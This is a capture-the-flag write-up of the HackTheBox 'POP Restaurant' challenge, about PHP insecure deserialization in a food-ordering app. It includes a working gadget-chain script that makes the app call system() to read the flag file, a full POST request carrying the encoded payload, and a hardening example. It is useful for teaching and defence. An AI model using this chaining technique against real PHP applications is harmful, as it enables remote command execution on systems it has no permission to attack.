POP Restaurant

`Spent a week to create this food ordering system. Hope that it will not have any critical vulnerability in my application.` A WEB Challenge from HackTheBox

A challenge involving source code review and PHP object injection (insecure deserialization) through a web form.

Content:

  • Recon

  • Source Code Review

  • PHP coding

  • Injection

How I (kinda) solved it:

Thanks for the help from this write-up: https://medium.com/@abdallahomaratya0/pop-restaurant-challenge-htb-b10989577596

Starting from the source code, I first spun up a Docker instance of the application to observe its responses and requests.

I noticed this code:

<form action="order.php" method="POST">
  <input type="hidden" name="data" value="<?php echo base64_encode(serialize(new Pizza())); ?>">
  <button type="submit" class="order__button">
    <img src="Static/Images/Pizza.gif" alt="Pizza">
  </button>
</form>

So there is a POST mechanism, and the hidden field carries a serialized Pizza object. When you look at the page itself there is no visible user input apart from a few images you click, and it took me a moment to realize that every click sends a request with that serialized object in it.

Docker Instance of the WebApp

So where am I going with this? Watching my Docker server confirmed that the application sends POST requests with that data field. Moving on.

The next step was to look at the classes behind these objects and see what their code does. They rely on PHP magic methods; see the manual for more about them:

https://www.php.net/manual/en/language.oop5.magic.php

The helper class ArrayHelpers and the three food classes Pizza, Spaghetti and IceCream:

ArrayHelpers:

class ArrayHelpers extends ArrayIterator
{
    public $callback;

    // Called once per element when the iterator is walked (e.g. by foreach):
    // whatever callable sits in the public $callback property is invoked
    // with the current element as its argument.
    public function current()
    {
        $value = parent::current();
        $debug = call_user_func($this->callback, $value);
        return $value;
    }
}

Pizza:

class Pizza
{
    public $price;
    public $cheese;
    public $size;

    public function __destruct()
    {
        echo $this->size->what;
    }
}

Spaghetti:

class Spaghetti
{
    public $sauce;
    public $noodles;
    public $portion;

    // Runs on access to any undefined property and calls $sauce as a function.
    public function __get($tomato)
    {
        ($this->sauce)();
    }
}

IceCream:

class IceCream
{
    public $flavors;
    public $topping;

    // Runs when the object itself is called like a function; iterating
    // $flavors drives ArrayHelpers::current() if $flavors is one.
    public function __invoke()
    {
        foreach ($this->flavors as $flavor) {
            echo $flavor;
        }
    }
}

So there are three food classes, each with one magic method (__destruct, __get, __invoke), plus the ArrayHelpers iterator, whose current() runs whatever callback its public property names.

I was kinda stuck, so I looked at @Abdulla Omar Atya's work and found that yes, you need to write new code that chains the three classes together to get execution. So I more or less copied his code, merged it into one script and worked through it, since I am not a PHP kind of guy; reading through the PHP manual pages helped a bit, but not really!

His idea of using the ArrayIterator is fantastic!

Goal: chain these classes so that the last link calls system() (or any other function).

The winning code:

<?php

// The class must live in the same namespace as in the target application,
// so that the serialized class name (Helpers\ArrayHelpers) matches.
namespace Helpers {
    use ArrayIterator;

    class ArrayHelpers extends ArrayIterator
    {
        public $callback;

        public function current()
        {
            $value = parent::current();
            call_user_func($this->callback, $value);
            return $value;
        }
    }
}

namespace {
    // Only the property layout matters for serialization; the magic
    // methods that make the chain fire live in the target application.
    class IceCream
    {
        public $flavors;
        public $topping;
    }

    class Spaghetti
    {
        public $sauce;
        public $noodles;
        public $portion;
    }

    class Pizza
    {
        public $price;
        public $cheese;
        public $size;
    }

    // Create the objects and set their properties
    $ArrayHelpers = new \Helpers\ArrayHelpers(['cat /pBhfMBQlu9uT_flag.txt']); // Explicitly reference the namespace
    $ArrayHelpers->callback = 'system';

    $IceCream = new IceCream();
    $IceCream->flavors = $ArrayHelpers;   // __invoke iterates this

    $Spaghetti = new Spaghetti();
    $Spaghetti->sauce = $IceCream;        // __get calls this

    $Pizza = new Pizza();
    $Pizza->size = $Spaghetti;            // __destruct reads size->what

    // Serialize the object
    $serialized = serialize($Pizza);

    // Encode it for transmission
    $encoded = base64_encode($serialized);

    echo "Serialized and encoded payload:\n";
    echo $encoded . "\n";
}
Payload Creation
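As an added hardening example (my own code, not the challenge's order.php and not Abdulla's script), this is how the order endpoint can stop trusting client-supplied objects: new clients send a menu key, and legacy base64(serialize()) input is parsed with allowed_classes => false, so the whole chain above arrives as inert __PHP_Incomplete_Class data and no magic method of an attacker-chosen class ever runs. SafeOrder and MENU are my names; Pizza, Spaghetti and IceCream are the challenge's classes and are assumed to be loaded.

```php
<?php
// Added hardening example for order.php; not the challenge's own code.
// Assumes the Pizza, Spaghetti and IceCream classes from the challenge
// source are loaded, and PHP >= 7.0 for the allowed_classes option.
declare(strict_types=1);

final class SafeOrder
{
    // Only these classes may ever be built from client input.
    private const MENU = [
        'Pizza'     => Pizza::class,
        'Spaghetti' => Spaghetti::class,
        'IceCream'  => IceCream::class,
    ];

    // Preferred path: the form sends a menu key, never an object.
    public static function fromMenuKey(string $key): object
    {
        if (!isset(self::MENU[$key])) {
            throw new InvalidArgumentException('unknown menu item');
        }
        $class = self::MENU[$key];
        return new $class();
    }

    // Transitional path for clients that still post base64(serialize($obj)).
    // allowed_classes => false turns every object in the stream into
    // __PHP_Incomplete_Class, so no __destruct, __get or __invoke of an
    // attacker-chosen class such as Helpers\ArrayHelpers can fire.
    public static function fromLegacyData(string $data): object
    {
        $raw = base64_decode($data, true);
        if ($raw === false) {
            throw new InvalidArgumentException('bad encoding');
        }
        $inert = @unserialize($raw, ['allowed_classes' => false]);
        if (!$inert instanceof __PHP_Incomplete_Class) {
            throw new InvalidArgumentException('not an order object');
        }
        // The array cast exposes the original class name as plain data;
        // nested payload objects are dropped together with $inert.
        $name = (string)(((array)$inert)['__PHP_Incomplete_Class_Name'] ?? '');
        return self::fromMenuKey($name);
    }
}
```

The rebuilt Pizza still has the challenge's own __destruct, but it only ever sees properties the server set, so there is nothing for a client to chain; wire the handler to call fromMenuKey() for new clients and fromLegacyData() for the old data field.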

The request:

POST /order.php HTTP/1.1
Host: 0.0.0.0:8080
Content-Length: 411
Cache-Control: max-age=0
Accept-Language: en-US,en;q=0.9
Origin: http://0.0.0.0:8080
Content-Type: application/x-www-form-urlencoded
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.6778.86 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://0.0.0.0:8080/index.php
Accept-Encoding: gzip, deflate, br
Cookie: PHPSESSID=
Connection: keep-alive

data=Tzo1OiJQaXp6YSI6Mzp7czo1OiJwcmljZSI7TjtzOjY6ImNoZWVzZSI7TjtzOjQ6InNpemUiO086OToiU3BhZ2hldHRpIjozOntzOjU6InNhdWNlIjtPOjg6IkljZUNyZWFtIjoyOntzOjc6ImZsYXZvcnMiO086MjA6IkhlbHBlcnNcQXJyYXlIZWxwZXJzIjo0OntpOjA7aTowO2k6MTthOjE6e2k6MDtzOjI2OiJjYXQgL1gxYktBaU05Z1F4T19mbGFnLnR4dCI7fWk6MjthOjE6e3M6ODoiY2FsbGJhY2siO3M6Njoic3lzdGVtIjt9aTozO047fXM6NzoidG9wcGluZyI7Tjt9czo3OiJub29kbGVzIjtOO3M6NzoicG9ydGlvbiI7Tjt9fQ==

From the docker instance